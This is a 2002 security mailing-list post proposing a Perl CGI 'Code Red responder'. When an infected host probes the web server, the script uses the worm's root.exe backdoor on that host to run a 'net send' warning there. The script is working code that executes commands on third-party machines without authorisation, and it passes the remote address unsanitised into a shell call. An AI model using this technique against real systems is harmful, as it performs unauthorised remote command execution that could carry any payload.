[Dshield] IIS Logs

John Hardin johnh at aproposretail.com
Fri Mar 29 17:26:58 GMT 2002


On Thu, 2002-03-28 at 22:56, Forum Admin wrote:
>  
> I'm working on a way to have it post a console
> message to the infected computer, which would remain on the victim's
> screen until they hit OK.

Here's one possibility.

httpd.conf:    AddHandler cgi-script .ida

Perl script named default.ida in the webserver root:

#!/usr/bin/perl

use CGI qw(param);
use strict;

my $ip = $ENV{"REMOTE_ADDR"};

system("lynx -dump
'http://$ip/scripts/root.exe?/c+net+send+localhost+Your+computer+is+infected+by+a+Code+Red+worm.+I+did+not+infect+you.+This+is+a+courtesy+response+generated+when+your+computer+attempted+to+infect+mine.+Your+computer+is+completely+exposed.+Visit+http://www.dynwebdev.com/codered/alert.htm+immediately!' &");

print "Content-type: text/html\n\n";
print "<html><body>";
print "<H1>This is an automated CODE RED responder.</H1>";
print "<H2>This script attempts to display a warning message on the
computer requesting this page.</H2>";
print "<H2>That computer appears to be at $ip</H2>";
print "</body></html>";


-- 
John Hardin                                   <johnh at aproposretail.com>
Internal Systems Administrator                    voice: (425) 672-1304
Apropos Retail Management Systems, Inc.             fax: (425) 672-0192
-----------------------------------------------------------------------
 "They [media giants] have no idea how to do business with resourceful
  human beings rather than passive vegetables. So they run to [the]
  government for protection."
                    -- Doc Searls on the SSSCA, in Linux Journal
-----------------------------------------------------------------------
 47 days until Star Wars episode II: Attack of the Clones




More information about the list mailing list